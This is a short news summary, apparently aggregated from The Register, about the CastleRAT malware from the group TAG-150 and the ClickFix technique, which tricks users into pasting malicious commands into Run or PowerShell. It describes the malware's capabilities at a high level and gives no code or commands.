"The ClickFix technique, first spotted last year, uses fake login screens from popular applications and web services, telling the user they have a problem and need to fix it. They instruct the operator to open the Windows Run dialog box or PowerShell terminal and cut and paste malware code into the system to "fix" the problem. And because the user installed the code themselves, it's more likely to get past security checks."
"The two variants of the malware, dubbed CastleRAT by security researchers at Recorded Future, are not equal, however. Both will establish a presence and download additional malware via a remote shell, and the Python build can self-delete if necessary. The C build is the most adept - capable of harvesting keystrokes, taking screen captures, and registering persistence. However, there is a method in this seeming disparity. The Python variant is far sneakier at slipping under the radar."
TAG-150 developed CastleRAT in both Python and C variants that propagate by tricking users into pasting malicious commands via ClickFix fake fixes and login prompts. Both variants create a foothold and download additional payloads through a remote shell, with the Python build able to self-delete. The C variant can harvest keystrokes, capture screens, and register persistence, while the Python variant currently exhibits few antivirus detections and appears designed for stealth. TAG-150 previously produced CastleBot and CastleLoader and distributes malware via bogus GitHub repositories and ClickFix social engineering. ClickFix convinces users to run pasted code in Run or PowerShell, increasing success against security checks.
Read at Theregister
Unable to calculate read time
Collection
[
|
...
]